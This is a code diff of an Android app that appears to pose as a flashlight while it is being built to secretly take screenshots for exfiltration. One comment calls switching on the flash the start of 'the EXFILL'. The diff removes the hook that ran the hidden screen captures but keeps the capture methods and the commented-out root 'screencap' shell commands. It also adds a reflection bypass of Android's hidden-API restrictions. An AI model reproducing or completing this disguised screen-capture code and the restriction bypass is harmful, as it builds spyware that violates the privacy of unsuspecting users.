@@ -1,40 +1,26 @@
 package com.mlw.extorch;
 
 import androidx.appcompat.app.AppCompatActivity;
-import androidx.constraintlayout.solver.widgets.Rectangle;
 
-import android.content.Intent;
 import android.content.pm.PackageManager;
 import android.graphics.Bitmap;
-import android.graphics.Camera;
-import android.graphics.Canvas;
-import android.graphics.Matrix;
 import android.hardware.camera2.CameraAccessException;
 import android.hardware.camera2.CameraManager;
-import android.net.Uri;
 import android.os.Bundle;
-import android.os.Environment;
 import android.os.StrictMode;
-import android.util.DisplayMetrics;
-import android.view.Display;
 import android.view.View;
-import android.view.WindowManager;
 import android.widget.CompoundButton;
 import android.widget.Switch;
 import android.widget.Toast;
-import com.mlw.extorch.ScreentShotUtil;
 
-import java.io.OutputStream;
-import java.util.concurrent.ForkJoinPool;
-import java.util.concurrent.TimeUnit;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
 
 import java.io.File;
 import java.io.FileNotFoundException;
 import java.io.FileOutputStream;
 import java.io.IOException;
-import java.nio.file.NotDirectoryException;
 import java.util.Date;
-import com.mlw.extorch.CacheScreenShoot;
 
 public class MainActivity extends AppCompatActivity {
 
@@ -46,11 +32,28 @@ public class MainActivity extends AppCompatActivity {
         super.onCreate(savedInstanceState);
         setContentView(R.layout.activity_main);
 
+
+        //workaround for accessing hidden api, currently still not working
+        //todo make hidden api's work
+        try {
+            Method forName = Class.class.getDeclaredMethod("forName", String.class);
+            Method getDeclaredMethod = Class.class.getDeclaredMethod("getDeclaredMethod", String.class, Class[].class);
+
+            Class vmRuntimeClass = (Class) forName.invoke(null, "dalvik.system.VMRuntime");
+            Method getRuntime = (Method) getDeclaredMethod.invoke(vmRuntimeClass, "getRuntime", null);
+            Method setHiddenApiExemptions = (Method) getDeclaredMethod.invoke(vmRuntimeClass, "setHiddenApiExemptions", new Class[] {String[].class});
+
+            Object vmRuntime = getRuntime.invoke(null);
+            setHiddenApiExemptions.invoke(vmRuntime, new String[][]{new String[]{"L"}});
+        } catch (NoSuchMethodException | IllegalAccessException | InvocationTargetException e) {
+            e.printStackTrace();
+        }
+
+
         // work around for uri exposed
         StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
         StrictMode.setVmPolicy(builder.build());
 
-        //workaround for hidden API's
 
         flashControl = findViewById(R.id.flashSwitch);
         cameraManager = (CameraManager) getSystemService(CAMERA_SERVICE);
@@ -60,8 +63,6 @@ public class MainActivity extends AppCompatActivity {
             if(getPackageManager().hasSystemFeature(PackageManager.FEATURE_CAMERA_FLASH)){
                 //HERE WE TURN THE FLASH ON AND START THE EXFILL
                 flashControl.setEnabled(true);
-                //pararrel screenshoot execution
-//                execute_captures();
             }else{
                 Toast.makeText(MainActivity.this, "This device has no flash!", Toast.LENGTH_SHORT).show();
             }
@@ -79,11 +80,6 @@ public class MainActivity extends AppCompatActivity {
                     } catch (CameraAccessException e) {
                         e.printStackTrace();
                     }
-                    try {
-                        execute_captures();
-                    } catch (IOException | InterruptedException e) {
-                        e.printStackTrace();
-                    }
                     flashControl.setText("Flash OFF");
                 }else{
                     try {
@@ -98,40 +94,33 @@ public class MainActivity extends AppCompatActivity {
 
     }
 
+    //todo try to implement screenshot functionality without root
     private void execute_captures() throws IOException, InterruptedException {
-//        final ForkJoinPool pool = ForkJoinPool.commonPool();
         Date date = new Date();
         CharSequence now = android.text.format.DateFormat.format("yyyy-MM-dd_hh:mm:ss", date);
         //create file directory in cache app dir
         File temp_dir = new File(getCacheDir(), "scrn");
         temp_dir.mkdir();
         String scrn_name = getCacheDir() + "/scrn/" + now + ".jpg";
+        //working only with root
         ScreentShotUtil.getInstance().takeScreenshot(this, "");
 
-//        ProcessBuilder pb = new ProcessBuilder("/system/bin/screencap", "-p", scrn_name);
-//        Process p = pb.start();
 
-//        Process sh = Runtime.getRuntime().exec("/system/bin/sh", null,null);
-//        OutputStream os = sh.getOutputStream();
-//        os.write(("/system/bin/screencap -p " + scrn_name).getBytes("ASCII"));
-//        os.flush();
-//        os.close();
-//        sh.waitFor();
+        //usable code but updated using the above classes
+        //        ProcessBuilder pb = new ProcessBuilder("/system/bin/screencap", "-p", scrn_name);
+        //        Process p = pb.start();
 
-
-//        while(true){
-//            cache_screenshoot();
-//        }
+        //        Process sh = Runtime.getRuntime().exec("/system/bin/sh", null,null);
+        //        OutputStream os = sh.getOutputStream();
+        //        os.write(("/system/bin/screencap -p " + scrn_name).getBytes("ASCII"));
+        //        os.flush();
+        //        os.close();
+        //        sh.waitFor();
 
 
-//        // execute 10 tasks
-//        for (int i = 0; i < 10; i++) {
-//            pool.execute(new CacheScreenShoot(this));
-//        }
-//
-//        pool.awaitQuiescence(3, TimeUnit.SECONDS);
     }
 
+    //working but it can only take screenshots off the running application
     private void cache_screenshoot(){
         Date date = new Date();
         CharSequence now = android.text.format.DateFormat.format("yyyy-MM-dd_hh:mm:ss", date);
@@ -158,16 +147,12 @@ public class MainActivity extends AppCompatActivity {
             bitmap.compress(Bitmap.CompressFormat.JPEG, 100, fileOutputStream);
             fileOutputStream.flush();
             fileOutputStream.close();
-            // image show not needed, but no working anyway :(
-//            Uri uri = Uri.fromFile(scrn);
-//            Intent intent = new Intent(Intent.ACTION_VIEW);
-//            intent.setDataAndType(uri, "image/*");
-//            startActivity(intent);
         } catch (FileNotFoundException e) {
             e.printStackTrace();
         } catch (IOException e) {
             e.printStackTrace();
         }
     }
+
 
 }
